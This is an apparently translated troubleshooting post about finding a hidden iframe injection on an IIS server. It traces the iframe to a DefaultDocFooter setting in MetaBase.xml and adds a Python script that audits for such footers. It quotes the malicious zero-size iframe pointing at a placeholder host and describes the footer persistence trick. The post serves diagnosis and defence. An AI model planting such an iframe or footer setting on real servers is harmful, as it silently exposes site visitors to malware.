On one server, the following code appears when almost any of its websites is opened, even for plain HTML pages.
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
Code of this kind is sometimes at the head of the page and sometimes at the tail. Anti-virus software reports a virus when the page is opened.
When I open the HTML, ASP or PHP files themselves, I can't find this code in their source.
Analyzing the cause
First, I suspected ARP malware. I used anti-ARP tools and found no ARP spoofing.
Moreover, ARP spoofing generally does not insert the code on every request, only some of the time.
The code is also present when the site is accessed through http://127.0.0.1 or http://localhost.
So the possibility of ARP spoofing is eliminated.
Then I thought that the JS files, or other included files, might have been tampered with. After searching, I found no modified pages. The code is inserted even when browsing a newly created HTML page, so the injection can only be happening through IIS.
After I backed up the IIS data and reinstalled IIS, the code disappeared. After I restored the backed-up IIS data, the problem came back.
After careful consideration, the problem had to lie in the IIS configuration file. When I opened the configuration file, I did not find that piece of code.
It was very likely that some file was being called. How could I check this? I suddenly remembered the famous Filemon.
I downloaded a copy locally and uploaded it to the server. I opened Filemon. There was too much data, so I filtered out the useless entries.
With only the IIS process left there was still a lot of data. It seems that many people were visiting the sites on the server.
I stopped all sites and built a test site, anky. Its directory is D:\www, and I created a blank page test.htm in it.
I visited this page and the code had been inserted. Looking at Filemon, strangely, IIS was reading C:\Inetpub\wwwroot\iisstart.htm
I opened C:\Inetpub\wwwroot\iisstart.htm and saw that it contains
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
I deleted the code, leaving the file blank, and test.htm loaded normally. Then I deleted C:\Inetpub\wwwroot\iisstart.htm itself and accessed the page again.
This time test.htm showed the error "Error reading data footer file". So this file really is being called.
Everything is normal once C:\Inetpub\wwwroot\iisstart.htm is emptied. But how is this being done? To really solve the problem, the cause has to be rooted out.
So I continued.
Could it be caused by an extension? I checked the extensions and everything was normal.
Of course, there are also trojans that are planted through ISAPI.
After much deliberation, I still felt that something was wrong in the configuration file.
Open the configuration file, which is located at %windir%\system32\inetsrv\MetaBase.xml
I opened it with Notepad, searched for iisstart.htm and found one line. At first I took it for the default site's setting, but then realized that could not be right.
The default sites had all been deleted. Take a closer look at this line:
DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"
Delete this line and the problem is completely solved.
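
To check a copy of MetaBase.xml for this setting at every level instead of searching for one file name, here is an added example (not part of the original post) that lists every key carrying a DefaultDocFooter and flags footer content containing an iframe or script tag. It assumes the IIS 6 XML metabase layout and the EnableDocFooter property; the sample metabase and the function names are constructed for illustration.

```python
import pathlib
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample in the IIS 6 MetaBase.xml layout (assumed: one element per
# metabase key, its path in "Location", its properties stored as attributes).
SAMPLE = r'''<configuration xmlns="urn:microsoft-catalog:XML_Metabase_V64_0">
<MBProperty>
<IIsWebService Location="/LM/W3SVC" EnableDocFooter="TRUE"
    DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm" />
<IIsWebServer Location="/LM/W3SVC/1" ServerComment="anky" />
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT" Path="D:\www" />
</MBProperty>
</configuration>'''

FRAME_RE = re.compile(r"<\s*(iframe|script)\b", re.IGNORECASE)

def audit_footers(root, read_file=None):
    """List keys that set DefaultDocFooter; read_file(path) -> str lets FILE: footers be inspected."""
    findings = []
    for elem in root.iter():
        attrs = {k.lower(): v for k, v in elem.attrib.items()}
        footer = attrs.get("defaultdocfooter")
        if footer is None:
            continue
        kind, _, value = footer.partition(":")
        kind = kind.upper()  # FILE: path on disk, STRING: inline HTML
        html = value if kind == "STRING" else (read_file(value) if read_file else "")
        findings.append({
            # A value set at /LM/W3SVC applies to every site that does not override it.
            "location": attrs.get("location", "?"),
            "kind": kind,
            "value": value,
            "enabled": attrs.get("enabledocfooter", "").upper() == "TRUE",
            "injects_frame": bool(FRAME_RE.search(html)),
        })
    return findings

def read_if_present(path):
    """Return the footer file's text, or "" when it cannot be read on this machine."""
    p = pathlib.Path(path)
    return p.read_text(errors="replace") if p.is_file() else ""

if __name__ == "__main__":
    # Usage: python audit_footers.py <copy of MetaBase.xml>; no argument runs the sample.
    root = ET.parse(sys.argv[1]).getroot() if len(sys.argv) > 1 else ET.fromstring(SAMPLE)
    for f in audit_footers(root, read_if_present):
        print("{location}: {kind} footer {value!r} enabled={enabled} frame={injects_frame}".format(**f))
```

Any footer reported on a server where nobody configured one deserves the same inspection the post gives iisstart.htm.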